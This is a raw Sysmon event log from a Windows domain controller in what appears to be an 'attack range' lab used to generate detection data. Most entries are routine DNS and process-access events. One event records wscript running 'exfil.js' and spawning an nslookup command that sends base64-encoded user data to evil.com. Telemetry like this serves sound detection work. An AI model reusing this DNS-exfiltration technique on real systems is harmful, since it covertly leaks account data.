354300x8000000000000000215335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.740{00000000-0000-0000-0000-000000000000}984<unknown process>-udpfalsefalse127.0.0.1-51277-false127.0.0.1-53domain 354300x8000000000000000215334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.740{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51277- 354300x8000000000000000215333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-51276-false127.0.0.1-53domain 354300x8000000000000000215332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51276- 354300x8000000000000000215331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-51276-false127.0.0.1-53domain 354300x8000000000000000215330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-51275-false127.0.0.1-53domain 354300x8000000000000000215329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51275- 354300x8000000000000000215328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-51275-false127.0.0.1-53domain 354300x8000000000000000215327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.673{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-51274-false127.0.0.1-53domain 354300x8000000000000000215326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.672{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51274- 354300x8000000000000000215325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.672{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-51274-false127.0.0.1-53domain 354300x8000000000000000215324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-51273-false127.0.0.1-53domain 354300x8000000000000000215323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51273- 354300x8000000000000000215322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown process>-udptruefalse127.0.0.1-51273-false127.0.0.1-53domain 354300x8000000000000000215321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-51272-false127.0.0.1-53domain 354300x8000000000000000215320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51272- 354300x8000000000000000215319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.602{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51271- 354300x8000000000000000215318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-51270-false127.0.0.1-53domain 354300x8000000000000000215317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51270- 354300x8000000000000000215316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-51270-false127.0.0.1-53domain 354300x8000000000000000215315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-51269-false127.0.0.1-53domain 354300x8000000000000000215314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51269- 354300x8000000000000000215313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.531{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-51268-false127.0.0.1-53domain 354300x8000000000000000215312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.531{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51268- 354300x8000000000000000215311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.471{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-51267-false127.0.0.1-53domain 354300x8000000000000000215310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.471{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51267- 354300x8000000000000000215309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.471{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-51267-false127.0.0.1-53domain 354300x8000000000000000215308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51266- 354300x8000000000000000215307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51265- 354300x8000000000000000215306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51264- 354300x8000000000000000215305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51263- 354300x8000000000000000215304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51262- 354300x8000000000000000215303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51261- 354300x8000000000000000215302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51260- 354300x8000000000000000215301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.297{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51259- 354300x8000000000000000215300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{00000000-0000-0000-0000-000000000000}6008<unknown process>-udptruefalse127.0.0.1-51258-false127.0.0.1-53domain 354300x8000000000000000215299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{00000000-0000-0000-0000-000000000000}6008<unknown process>-udpfalsefalse127.0.0.1-51257-false127.0.0.1-53domain 354300x8000000000000000215298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{00000000-0000-0000-0000-000000000000}6008<unknown process>-udptruefalse127.0.0.1-51257-false127.0.0.1-53domain 354300x8000000000000000215297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.220{00000000-0000-0000-0000-000000000000}6008<unknown process>-udpfalsefalse127.0.0.1-51256-false127.0.0.1-53domain 354300x8000000000000000215296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.220{00000000-0000-0000-0000-000000000000}6008<unknown process>-udptruefalse127.0.0.1-51256-false127.0.0.1-53domain 354300x8000000000000000215295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-51252-false127.0.0.1-53domain 354300x8000000000000000215294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-51252-false127.0.0.1-53domain 354300x8000000000000000215293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-51251-false127.0.0.1-53domain 10341000x8000000000000000215292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.421{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3D46-000000005F02}6960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-51251-false127.0.0.1-53domain 10341000x8000000000000000215290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.421{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3D46-000000005F02}6960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-51250-false127.0.0.1-53domain 354300x8000000000000000215288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.059{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-51250-false127.0.0.1-53domain 354300x8000000000000000215287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-51249-false127.0.0.1-53domain 354300x8000000000000000215286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-51249-false127.0.0.1-53domain 354300x8000000000000000215285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-51248-false127.0.0.1-53domain 354300x8000000000000000215284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.970{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-51248-false127.0.0.1-53domain 354300x8000000000000000215283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.969{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-51247-false127.0.0.1-53domain 354300x8000000000000000215282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.969{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-51247-false127.0.0.1-53domain 10341000x8000000000000000215281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.406{2E1864BB-18FE-629A-3D46-000000005F02}69607432C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3C46-000000005F02}7940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.384{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3D46-000000005F02}6960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3C46-000000005F02}7940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-18E0-629A-6742-000000005F02}39764580C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3C46-000000005F02}7940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.379{2E1864BB-18FE-629A-3C46-000000005F02}7940C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcvm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.370{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfi.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-18FE-629A-3A46-000000005F02}29008016C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3B46-000000005F02}3972C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.322{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 